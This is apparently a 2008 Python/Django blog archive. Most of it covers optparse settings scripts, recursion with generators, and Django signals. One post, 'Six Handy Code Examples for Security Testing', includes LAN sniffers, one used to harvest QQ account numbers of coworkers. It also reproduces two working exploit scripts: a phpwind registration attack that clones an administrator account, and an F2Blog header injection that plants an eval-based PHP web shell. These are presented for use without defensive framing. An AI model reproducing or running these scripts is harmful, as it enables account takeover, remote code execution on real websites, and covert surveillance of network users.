parser.add_option('-s', '--settings', dest='settings', metavar='SETTINGS',
                  help="The Django settings module to use")
(options, args) = parser.parse_args()
if not options.settings:
    parser.error("You must specify a settings module")

os.environ['DJANGO_SETTINGS_MODULE'] = options.settings

There’s a lot going on here in a very small amount of code, so let’s walk through it step-by-step:

  1. We import the standard os module and the OptionParser class from optparse.
  2. We set up a usage string; optparse will print this in help and error messages.
  3. We create an OptionParser with the usage string.
  4. We add an option to the OptionParser: the script will accept an argument, either as -s or as the long option --settings, whose value will be stored in the “settings” attribute of the parsed options, and we give it some explanatory text to show in help and error messages.
  5. We parse the arguments from the command line using parser.parse_args().
  6. We check to see that the “settings” argument was supplied, and direct the parser to throw an error if it wasn’t.
  7. We use os.environ to set DJANGO_SETTINGS_MODULE.

Not bad for about ten lines of easy-to-write code; once that’s been done, DJANGO_SETTINGS_MODULE will have been set and we can use any Django components we like. Running the script will look like this:

python myscript.py --settings=yoursite.settings

The parser created with optparse will handle the parsing; it’ll also automatically enable a “help” option for the -h or --help flags which will list all of the available options and their help text, and show appropriate error messages when the required “settings” argument isn’t supplied.
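The parsing behaviour is easy to try out without a real command line: parse_args() accepts an explicit argument list in place of sys.argv. A quick check (Python 3 here; optparse still ships in the standard library, though argparse has since superseded it):

```python
from optparse import OptionParser

# build the same parser as in the article
parser = OptionParser("usage: %prog -s SETTINGS | --settings=SETTINGS")
parser.add_option('-s', '--settings', dest='settings', metavar='SETTINGS',
                  help="The Django settings module to use")

# parse a simulated command line instead of the real sys.argv
options, args = parser.parse_args(['--settings=yoursite.settings'])
print(options.settings)  # yoursite.settings
```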

Because optparse makes it easy to pack a lot of configurability into a small amount of code, it’s generally my preferred method for writing standalone scripts which need to interact with Django, and I highly recommend spending some time with its official documentation. If you’d like to use one of the other configuration methods — setup_environ() or settings.configure() — it’s relatively easy to write an optparse-based script which does the right thing.

And that’s a wrap

Each of these methods is appropriate for different types of situations, and depending on exactly what you need to do you may end up using all of them at various times. Personally, I tend to either write scripts which use optparse and take a command-line argument for settings, or (for maintenance tasks which will run in cron) to write scripts which just assume DJANGO_SETTINGS_MODULE is taken care of in advance, but all of these methods can be useful, so keep them all in mind whenever you find yourself needing a standalone script that uses Django.

Sunday, October 26, 2008

Python|Six Handy Code Examples for Security Testing

Six Handy Python Code Examples for Security Testing


Most of this code was collected from elsewhere. It comes in handy when testing: packet sniffing, sending requests, processing files with regular expressions, injection testing, and so on.
You can extend it to fit your own projects; the code aims for conciseness, with an emphasis on security testing.
I have been learning Python for three months now and find it extremely useful.
A few days ago my PM even asked me to write a program to help with his office work.

Lately I have noticed that many companies are listing Python in their job postings.
Rather than talk at length about what Python can do, I'll just show some examples.
I recommend spending some time on it; you can pick up the basics in about a day.
It is very popular abroad. My PM is German, and over there Python seems to be taught as a first language, much the way C is taught here.
There are many Python developers and companies overseas, relatively few domestically.
I learned it to help with my work and to play around with hacking; it is also powerful for everyday use.
Google offers Google App Engine, a hosting-like service for building web applications in Python, and Google itself relies heavily on Python.

Most common tasks can be handled with a single function call: downloading files, sending requests, parsing web pages, reading and writing XML, compressing files, crawling and searching.
Almost all of this is cross-platform and runs on Linux.
IronPython is a tool that combines the .NET platform with Python, and its developers are studying how to use Python to run .NET on Linux.

Nokia phones have started to support Python programming.
Java and .NET now provide Python implementations as well.

The examples below demonstrate what Python can do.

1. Packet sniffing: this example sniffs the real playback addresses of Flash videos on Tudou.

import pcap, struct, re
from pickle import dump, load

pack = pcap.pcap()
pack.setfilter('tcp port 80')
regx = r'/[\w+|/]+.flv|/[\w+|/]+.swf'
urls = []
hosts = []
print 'start capture....'
for recv_time, recv_data in pack:
    urls = re.findall(regx, recv_data)
    if len(urls) != 0: print urls

2. Sniffing QQ numbers. A few days ago I used this to sniff all the QQ accounts on our LAN. Sadly it cannot identify gender, but you can add that yourself.

# -*- coding: cp936 -*-
import pcap, struct

pack = pcap.pcap()
pack.setfilter('udp')
key = ''
for recv_time, recv_data in pack:
    recv_len = len(recv_data)
    if recv_len == 102 and recv_data[42] == chr(02) and recv_data[101] == chr(03):
        print struct.unpack('>I', recv_data[49:53])[0]
    elif recv_len == 55:
        print struct.unpack('>I', recv_data[49:53])[0]

3. Packet sniffing: on one project I needed to sniff data sent to a specific port, so I spent a few minutes writing this.

import pcap, struct
from pickle import dump, load

pack = pcap.pcap()
pack.setfilter('port 2425')
f = open(r'/mm.txt', 'w+')
print 'start capture....'
for recv_time, recv_data in pack:
    print recv_time
    print recv_data
    f.write(recv_data)

3.5. File content search: I found that the search built into Windows cannot search file contents reliably, so I wrote my own.

import os, string, re, sys

class SevenFile:
    files = []
    def FindContent(self, path):
        walks = os.walk(path)
        for walk in walks:
            for filename in walk[2]:
                if '.mht' == filename[-4:]:
                    res_taskid = []
                    file = walk[0] + '\\' + filename
                    f = open(file)
                    content = f.read()
                    pattern_taskid = re.compile(r'Stonehenge-UIVerificationChecklist\.mht', re.IGNORECASE)
                    res_taskid = pattern_taskid.findall(content)
                    f.close()
                    if len(res_taskid) > 0:
                        self.files.append(file)

def run():
    f = SevenFile()
    f.FindContent(r"E:\work\AP\Manual Tests\PSIGTestProject\PSIGTestProject")
    for filepath in f.files:
        print filepath
    print "OK"

if __name__ == "__main__":
    run()

4. This one is not mine; it is code from the web for attacking phpwind forums.

# -*- coding: gb2312 -*-
import urllib2, httplib, sys
httplib.HTTPConnection.debuglevel = 1
cookies = urllib2.HTTPCookieProcessor()
opener = urllib2.build_opener(cookies)

def usage():
    print "Usage:\n"
    print " $ ./phpwind.py pwforumurl usertoattack\n"
    print " pwforumurl    the target forum URL, e.g. http://www.80sec.com/"
    print " usertoattack  a privileged moderator or administrator on the target"
    print " on success, an account identical to the target user is registered on the forum"
    print " the latest version can be logged into with the uid"
    print " other versions can be logged into with cookie + user-agent"
    print "########################################################"
    print ""

argvs = sys.argv
usage()

data = "regname=%s%s1&regpwd=@80sec&regpwdrepeat=@80sec&regemail=...@foo.com&regemailtoall=1&step=2" % (argvs[2], "%c1")
pwurl = "%s/register.php" % argvs[1]

request = urllib2.Request(
    url = pwurl,
    headers = {'Content-Type': 'application/x-www-form-urlencoded',
               'User-Agent': '80sec owned this'},
    data = data)
f = opener.open(request)
headers = f.headers.dict
cookie = headers["set-cookie"]
try:
    if cookie.index('winduser'):
        print "Exploit Success!"
        print "Login with uid password @80sec or Cookie:"
        print cookie
        print "User-agent: 80sec owned this"
except:
    print "Error! http://www.80sec.com"
    print "Connect root#80sec.com"

5. Injection attack: an injection demo against a specific application.

#!c:\python24\python
# Exploit For F2Blog All Version
# Author BY MSN:pt...@vip.sina.com
# Date: Jan 29 2007

import sys
import httplib
from urlparse import urlparse
from time import sleep

def injection(realurl, path, evil):  # url, /bk/, evilip
    cmd = ""
    cookie = ""
    header = {'Accept': '*/*',
              'Accept-Language': 'zh-cn',
              'Referer': 'http://' + realurl[1] + path + 'index.php',
              'Content-Type': 'application/x-www-form-urlencoded',
              'User-Agent': useragent,
              'Host': realurl[1],
              'Content-length': len(cmd),
              'Connection': 'Keep-Alive',
              'X-Forwarded-For': evil,
              'Cookie': cookie}
    #cmd = "formhash=6a49b97f&referer=discuz.php&loginmode=&styleid=&cookietime=2592000&loginfield=username&username=test&password=123456789&questionid=0&answer=&loginsubmit=%E6%8F%90+%C2%A0+%E4%BA%A4"
    #print header
    #print path
    #sys.exit(1)
    http = httplib.HTTPConnection(realurl[1])
    http.request("POST", path + "index.php", cmd, header)
    sleep(1)
    http1 = httplib.HTTPConnection(realurl[1])
    http1.request("GET", path + "cache/test11.php")
    response = http1.getresponse()
    re1 = response.read()
    #print re1
    print re1.find('test')
    if re1.find('test') == 0:
        print 'Exploit Success!\n'
        print 'View Your shell:\t%s' % shell
        sys.exit(1)
    else:
        sys.stdout.write("Exploit FALSE!")
    http.close()
    #sleep(1)
    #break
    sys.stdout.write("\n")

def main():
    print 'Exploit For F2Blog All Version'
    print 'Codz by pt...@vip.sina.com\n'
    if len(sys.argv) == 2:
        url = urlparse(sys.argv[1])
        if url[2][-1:] != '/':
            u = url[2] + '/'
        else:
            u = url[2]  # u == /bk/
    else:
        print "Usage: %s " % sys.argv[0]
        print "Example: %s http://127.0.0.1/bk" % sys.argv[0]
        sys.exit(0)

    print '[+] Connect %s' % url[1]
    print '[+] Trying...'
    print '[+] Plz wait a long long time...'
    global shell, useragent
    shell = "http://" + url[1] + u + "cache/test11.php"
    query = 'fputs(fopen(\'cache/test11.php\',\'w+\'),\'@eval($_REQUEST[c])?>test\')'
    query = '\'));' + query + ';/*'
    evilip = query
    useragent = ""
    cookie = ""
    injection(url, u, evilip)
    evilip = ""
    injection(url, u, evilip)

    print '[+] Finished'

if __name__ == '__main__':
    main()

6. Injection attack: a complete Access + ASP injection tool.
The code is rather long, so download it yourself:

http://www.xfocus.net/tools/200408/780.html

There is an even more powerful Python injection tool from abroad (sqlmap), which supports essentially all the major databases: MySQL, Oracle, PostgreSQL and Microsoft SQL Server back-ends. Besides these four DBMSs, sqlmap can also identify Microsoft Access, DB2, Informix and Sybase.

Search for it and download it yourself.

It supports GET, POST and cookie injection, and lets you set cookies and user-agents.
It supports blind injection, error-based injection, and several other injection techniques.
It supports proxies.
Its algorithms are optimized for efficiency.
It uses fingerprinting to identify the database.

Wednesday, October 22, 2008

Python|Recursion and Generators

Recursion and Generators

[Japanese]

Abstract: A certain kind of problem can be described quite efficiently with recursive procedures. But sometimes you need strict control over a recursive procedure that produces a huge amount of data, which adds difficulty to coding. Python generators, available in Python 2.2 or later, allow us to control these procedures easily while keeping programs concise.

The source code mentioned in this document is here. The plain text version is here.


Introduction

No one doubts the power of recursion. Although it sometimes might look a little bit complicated, it normally provides a quick way to describe a solution. This is especially true if the size of the data handled by a procedure grows exponentially. Traversing a tree is a good example. Since each node in a tree has one or more child nodes, the number of nodes grows exponentially as the procedure goes down the tree. But if all nodes are homogeneous, the same procedure can be applied to every node again and again.

Tree traversal is a trivial example of recursion, because almost every computer science textbook explains it. Probably everyone will happily choose recursion for tree traversal without any deep consideration. There are, of course, many other tasks where recursion works pretty well, so let us take another example.

Consider the following function f which takes a set of vectors (V1, V2, V3, ... , Vn) and returns the set of all possible combinations of their elements: each combination is an n-element vector (x1, x2, ... , xn) where xi is an element of Vi. The total number of vectors this function returns is |V1| x |V2| x |V3| x ... x |Vn|.

Let us consider implementing this function in Python. For simplicity, we use String objects to represent each vector Vi. The function returns a set of vectors as a list. The expected result is the following:

f([]) --> ['']  # 1
f(['abc']) --> ['a', 'b', 'c'] # 3
f(['abc', 'xyz']) --> ['ax', 'ay', 'az', 'bx', 'by', 'bz', 'cx', 'cy', 'cz'] # 9
f(['abc', 'xyz', '123']) --> ['ax1', 'ax2', 'ax3', 'ay1', 'ay2', 'ay3', 'az1', 'az2', 'az3',
'bx1', 'bx2', 'bx3', 'by1', 'by2', 'by3', 'bz1', 'bz2', 'bz3',
'cx1', 'cx2', 'cx3', 'cy1', 'cy2', 'cy3', 'cz1', 'cz2', 'cz3'] # 27
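As an aside, the function f described here is exactly the Cartesian product, which later versions of the standard library (Python 2.6 and up, so not yet available when this article was written) provide directly as itertools.product. A quick check against the expected results above, in Python 3 syntax:

```python
from itertools import product

def f(args):
    # product(*[]) yields a single empty tuple, matching f([]) --> ['']
    return ["".join(combo) for combo in product(*args)]

print(f(['abc', 'xyz']))
# ['ax', 'ay', 'az', 'bx', 'by', 'bz', 'cx', 'cy', 'cz']
```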

At first glance, it looks easy to implement. You might think that this function can be written easily without using any recursion. Let's try.


Solutions

First, if you don't want to use recursion at all, your program might end up with something like this:

Non-recursive Version

def f0(args):
    counter = [ 0 for i in args ]
    r = []
    while 1:
        r.append("".join([ arg1[i] for arg1,i in zip(args, counter) ]))
        carry = 1
        x = range(len(args))
        x.reverse() # x == [len(args)-1, len(args)-2, ..., 1, 0]
        for i in x:
            counter[i] += 1
            if counter[i] < len(args[i]):
                carry = 0
                break # leave "for"
            counter[i] = 0
        else:
            break # leave "while"
    return r

Without using recursion, you have to remember intermediate states somehow to produce all possible solutions. In this program, I tried to emulate something like full-adders. First the program prepares a list of integers and then repeatedly attempts to add one to the least significant digit. At each iteration, it concatenates elements in each argument and put it into variable r. But the behavior of this program is not so clear, even though some variable names such as "carry" are suggestive.

Recursive Version

Now you have recursion. The function f can be defined recursively as follows:

f(Vi, Vi+1, ... , Vn) = ({xi1} + f(Vi+1, ... , Vn)) +
                        ({xi2} + f(Vi+1, ... , Vn)) +
                        ...
                        ({xim} + f(Vi+1, ... , Vn)) .

With this definition, you can make the program much simpler by having it call itself:

def fr(args):
    if not args:
        return [""]
    r = []
    for i in args[0]:
        for tmp in fr(args[1:]):
            r.append(i + tmp)
    return r

The implementation above is very straightforward. The power of recursion is that you can split the problem into several subproblems and apply exactly the same machinery to each of them. This program simply takes each element of the first argument and concatenates it with every solution of the same function called with one fewer argument (Fig 1).


Fig 1. Recursive Version

More Solutions

So far we have seen functions which return all the results at once. But in some applications such as searching or enumerating, you probably don't want to remember all the combinations. What you want is to inspect one combination at a time and throw it away after using it.

When the number of outputs is small, this is not a big deal. But what we expected from recursive procedures was a quick solution for functions whose result grows exponentially, right? Ironically, however, such functions tend to produce a huge amount of data, and that causes problems in your program: it cannot remember all the results, and sooner or later it will hit the memory limit:

$ ulimit -v 5000
$ python
...
>>> for x in fr(["abcdefghij","abcdefghij","abcdefghij","abcdefghij","abcdefghij"]):
... print x
...
Traceback (most recent call last):
File "<stdin>", line 1, in ?
File "<stdin>", line 7, in fr
MemoryError

The typical solution for this is to split every combination into different states. The typical way to do this in Python is to build an iterator.

Iterator Version

In Python, a class which has an __iter__ method can be used as an iterator. Although iterators are not functionally identical to lists, they can be used instead of lists in some statements and functions (for, map, filter, etc.).

class fi:
    def __init__(self, args):
        self.args = args
        self.counter = [ 0 for i in args ]
        self.carry = 0
        return

    def __iter__(self):
        return self

    def next(self):
        if self.carry:
            raise StopIteration
        r = "".join([ arg1[i] for arg1,i in zip(self.args, self.counter) ])
        self.carry = 1
        x = range(len(self.args))
        x.reverse() # x == [len(args)-1, len(args)-2, ..., 1, 0]
        for i in x:
            self.counter[i] += 1
            if self.counter[i] < len(self.args[i]):
                self.carry = 0
                break
            self.counter[i] = 0
        return r

# display
def display(x):
    for i in x:
        print i,
    print
    return

In this program, you can use the constructor of the class fi in the same manner as the recursive version fr as in:

>>> display(fi(["abc","def"])) 

When this instance is passed to a for statement, the __iter__ method is called and the returned object (the object itself in this case) is used as the iterator of the loop. At each iteration, the next method is called without argument and the return value is stored in the loop variable.

However, this program is not easy to understand. Algorithmically, it is similar to the non-recursive version described above. Each time the next method is called, it updates the current state stored in the counter variable and returns one result according to that state. But it looks even more complicated, since the method is designed to be called inside a loop, which is not shown explicitly here. Readers might be puzzled to see it check the carry variable at the top of the next method; they have to imagine an (invisible) loop outside this method to understand it.

Generator Version

Now we have generators. The program gets much simpler:

def fg(args):
    if not args:
        yield ""
        return
    for i in args[0]:
        for tmp in fg(args[1:]):
            yield i + tmp
    return
Note that this is not only simpler than the iterator version, but even simpler than the original recursive version. With generators, we can simply throw (or "yield") results one at a time and forget them afterwards. It is just like printing results to a stream device: you don't really have to care about preserving state. All you have to do is produce all the results recklessly, and you still keep strict control over the procedure. You might notice that something similar can be achieved with lazy evaluation, which is supported in some functional languages. Although lazy evaluation and generators are not exactly the same notion, both make this kind of situation easy to handle, each in its own form.
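The laziness is easy to verify: with itertools.islice we can pull just a handful of results from the generator, while the 100,000 combinations that exhausted memory in the recursive version are never all materialized at once (a Python 3 rendering of fg):

```python
from itertools import islice

def fg(args):
    if not args:
        yield ""
        return
    for head in args[0]:
        for tail in fg(args[1:]):
            yield head + tail

# 10**5 combinations exist, but only five are ever produced
first_five = list(islice(fg(["abcdefghij"] * 5), 5))
print(first_five)  # ['aaaaa', 'aaaab', 'aaaac', 'aaaad', 'aaaae']
```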

Lambda-encapsulation Version

Perhaps functional programmers might prefer lambda encapsulation to objects. Python also allows us to do this. In fact, however, this was a real puzzle to me. I could do things in the same manner as I did the iterator version. But I wanted to do something different. After hours of struggles, I finally came up with something like this:

def fl(args, i=0, tmp="", parent_sibling=None):
    if not args:
        # at a leaf
        return (tmp, parent_sibling)
    if i < len(args[0]):
        # prepare my sibling
        sibling = fl(args, i+1, tmp, parent_sibling)
        return lambda: fl(args[1:], 0, tmp+args[0][i], sibling)
    else:
        # go up and visit the parent's sibling
        return parent_sibling

# traverse function for lambda version
def traverse(n):
    while n:
        if callable(n):
            # node
            n = n()
        else:
            # leaf
            (result, n) = n
            print result,
    print

The idea is indeed to treat it as tree traversal. The function f can be regarded as a tree which contains a partial result at each node (Fig 2). A function produced by fl retains its position, the next sibling node, and the next sibling of the parent node in the tree. As it descends the tree, the elements of the vectors are accumulated. When it reaches a leaf, it has one complete solution (a combination of elements). If there is no node left to traverse at the same level, it goes back to the parent node and tries the parent's next sibling. A special driver routine is needed to traverse the tree.


Fig 2. The Function f as Tree Traversal

Of course, the generator version can also be regarded as tree traversal. In this case, you visit the tree and drop a result at each node.


CHANGES:
Jun 1, 2003: Released.
Jun 7, 2003: A small update based on the comments by Eli Collins.

Tuesday, October 21, 2008

Django|Signals in Django: Stuff That’s Not Documented (Well)

Ref From URL:http://www.chrisdpratt.com/2008/02/16/signals-in-django-stuff-thats-not-documented-well/

I’ve just spent the last few hours learning how to use signals in Django. After many, many searches on Google and much trial and error, I think I finally have a grasp on these silly things, and since I’m an all around nice guy, I’m going to spare those lucky few that happen upon this post the same hell.

Before I start, I want to go ahead and give credit to those who provided some of the crucial pieces to the puzzle during my quest.

Okay, now let’s get started.

Creating Custom Signals

In the application I’m working on, I needed to send an email whenever a user reset his/her password, a pretty common use case. Unfortunately, none of Django’s built-in signals fit the bill. The User model gets saved when the password is reset (allowing the use of the post_save signal), but it also gets saved in a lot of other scenarios. The password reset is a special case and needed to be handled as such.

Turns out that it’s actually not that difficult to set this up. If you haven’t already, create a file named signals.py in directory of the application you’re working on. Then in that file, add the following:

# myapp/signals.py
password_reset = object()

The name `password_reset` is inconsequential; use whatever name best conveys the action that causes the signal to be sent.

Next, set up a listener for that signal. The following code can technically go just about anywhere, as long as it gets executed before the signal is sent. I put it in models.py for ease.

# myapp/models.py
from django.dispatch import dispatcher
from myproject.myapp import signals as custom_signals
...
dispatcher.connect(send_password_reset_email, signal=custom_signals.password_reset)

`send_password_reset_email` is the function that will be called when the signal is received. Obviously, we’ll need to set that up. Back to signals.py:

# myapp/signals.py
from django.conf import settings
from django.core.mail import send_mail
from django.contrib.sites.models import Site
from django.template.loader import render_to_string
...
def send_password_reset_email(sender, user, new_pass, signal, *args, **kwargs):
    current_site = Site.objects.get_current()
    subject = "Password Reset on %(site_name)s" % { 'site_name': current_site.name }
    message = render_to_string(
        'account/password_reset_email.txt',
        { 'username': user.username,
          'new_pass': new_pass,
          'current_site': current_site }
    )
    send_mail(subject, message, settings.DEFAULT_FROM_EMAIL, [user.email])

Exactly how this code works is left as an exercise to the reader. I provided it merely to be comprehensive. What the function that gets called when the signal is received does will be specific to your purposes.

However, there are a few points worth mentioning. When you use Django’s built-in signals, your function definition will almost invariably look like the following:

def my_function(sender, instance, signal, *args, **kwargs):

Notice that my definition didn’t include `instance` and had `user` and `new_pass` arguments instead. You can pass whatever arguments you like when you send the signal (we’ll get to this in a second). The only requirement is that the function that gets called can handle them. Django simply chose to use an argument named `instance`, nothing more, nothing less.

Finally, at the exact point where you want the function associated with the signal to be executed (in my case, right after a new password is generated and the User instance is saved), insert the following:

dispatcher.send(signal=custom_signals.password_reset, user=self.user, new_pass=new_pass)

The only required part is obviously the signal you want to send. Everything after is simply data you’d like to pass along. Remember that the function definition in signals.py must accept all the arguments you choose to pass in.

Also don’t forget to add the following to your imports in the file where you call dispatcher.send():

from django.dispatch import dispatcher
from myproject.myapp import signals as custom_signals

And we’re done. Easy as pie, once you know what you’re doing.
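The connect/send plumbing used above is just the dispatcher (publish/subscribe) pattern, so it can be sketched in a few lines of plain Python. This toy stand-in is not Django's actual implementation; it only mirrors the shape of the calls in this post:

```python
# a minimal signal dispatcher, mimicking the connect/send API used above
class Dispatcher:
    def __init__(self):
        self._receivers = {}  # signal object -> list of callables

    def connect(self, receiver, signal):
        self._receivers.setdefault(signal, []).append(receiver)

    def send(self, signal, **kwargs):
        # call every receiver registered for this signal, forwarding kwargs
        return [receiver(signal=signal, **kwargs)
                for receiver in self._receivers.get(signal, [])]

dispatcher = Dispatcher()
password_reset = object()  # the signal is just a unique marker object

def send_password_reset_email(signal, user, new_pass, **kwargs):
    return "mail to %s (new password: %s)" % (user, new_pass)

dispatcher.connect(send_password_reset_email, signal=password_reset)
results = dispatcher.send(signal=password_reset, user="alice", new_pass="s3cret")
print(results)  # ['mail to alice (new password: s3cret)']
```

This also shows why `password_reset = object()` works as a signal: the object is never called, only used as a dictionary key identifying the event.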

Signaling Just When an Object is Created

Conspicuously missing from Django’s built-in signals is one for the creation of an object. We have pre_save and post_save signals, but both of those work whether the object is being created or just being updated.

Again, finding a solution to this little issue was spurred by my own needs. I wanted to send a welcome email when a user first registers, another common use case. Obviously, I didn’t want the same welcome email sent every time the user updates their details, so post_save was out. Or was it?

After a fair amount of digging, I found the solution squirreled away in Django’s model tests. Apparently, Django automagically passes in a `created` flag if the object was created, so all that’s required is to test for that flag before you do whatever you plan on doing (sending the welcome email in my case).

def send_welcome_email(sender, instance, signal, *args, **kwargs):
    if 'created' in kwargs:
        if kwargs['created']:
            pass  # Send email

First, we test that a `created` argument was passed in. If it was, we verify that its value is True.
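The two checks can also be collapsed into one with dict.get, which returns None (falsy) when the key is missing. A small illustration with a stub handler; the return strings here are just for demonstration:

```python
def send_welcome_email(sender, instance, signal, *args, **kwargs):
    # kwargs.get('created') is None when the flag is absent, so one test suffices
    if kwargs.get('created'):
        return "sending welcome email"
    return "skipping"

print(send_welcome_email(None, None, None, created=True))   # sending welcome email
print(send_welcome_email(None, None, None, created=False))  # skipping
print(send_welcome_email(None, None, None))                 # skipping
```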

Finally, set up a listener as usual. Again, where you put it matters not as long as it gets executed before the signal gets sent; models.py is a good place.

# myapp/models.py
from django.dispatch import dispatcher
from django.db.models import signals
...
dispatcher.connect(send_welcome_email, signal=signals.post_save, sender=UserProfile)

The `sender` argument limits the signal to a particular model. I chose to send it upon the creation of UserProfile, the profile model associated with User in my app. If you left this part out, our send_welcome_email function would be called every time any model in your application was saved, which would obviously not be desirable.

And, just like that, you get code that will only execute when the model is first created.

Handling Signals Asynchronously

Both of the above examples send emails. It normally doesn’t take much time to send an email, but if the server load is heavy, it could take longer than normal. Ideally, anytime you do anything like this, you want it to be done asynchronously so that users don’t have to wait for the processing to finish before they can move on to something else.

Django’s signals provide half the functionality by decoupling the code for sending the email from the view. However, by default, Django’s signals are synchronous; the signal gets sent and the application waits for its successful completion before moving on. Thankfully, Python has the answer in its threading module.

A thread, extremely simplified, can be thought of as a branch of a running program (Django in this case). It becomes its own entity, able to run independently of its parent process; you could think of it as a little mini-Django tasked with a very specific and finite purpose. Once it completes its function, it goes away. This buys us the ability to let something run while still continuing on in our application.
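As a toy illustration (no Django involved), a thread started from the main program runs alongside it. The slow task below finishes after the main line of execution has already moved on:

```python
import threading
import time

order = []

def slow_task():
    # Stand-in for a slow job such as sending an email
    time.sleep(0.1)
    order.append('slow task finished')

t = threading.Thread(target=slow_task)
t.start()                        # returns immediately
order.append('main kept going')  # runs while slow_task is still sleeping
t.join()                         # wait for the thread before exiting
print(order)                     # → ['main kept going', 'slow task finished']
```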

While it sounds rather complicated, it’s actually relatively easy to set up. The following is the actual code I’m using for the welcome email discussed earlier:

```python
import threading
...

class WelcomeEmailThread(threading.Thread):
    def __init__(self, instance):
        self.instance = instance
        threading.Thread.__init__(self)

    def run(self):
        # The actual code we want to run, i.e. sending the email
        pass

def send_welcome_email(sender, instance, signal, *args, **kwargs):
    if 'created' in kwargs:
        if kwargs['created']:
            WelcomeEmailThread(instance).start()
```

First, we create a new class which subclasses threading.Thread. The name of the class is inconsequential; just pick something descriptive. In this class, we have two functions defined: `__init__` and `run`.

The `__init__` function allows us to pass in the instance we received from the signal. We store the instance as an attribute so it can be retrieved later, and then we call the `__init__` method on threading.Thread. This is necessary because we have overridden the `__init__` function inherited from threading.Thread, but the parent class still needs to perform its normal initialization; without that call, the thread cannot be started.

The `run` function is the heart of the class. This is where the email sending will now occur.

Finally, in the `send_welcome_email` function, which previously housed the code for sending the email, we now start the thread instead. The `if` statements are just specifying that this code should only run if the object is being created instead of updated (see previous topic).

That’s all that’s required. Now, when the signal is received it will simply spawn off a thread to send the email and return processing back to the rest of our application. Not bad at all.

Wrap Up

That’s all I’ve got for now, but I think it covers the three most confusing areas of Django’s signals. Happy Django’ing.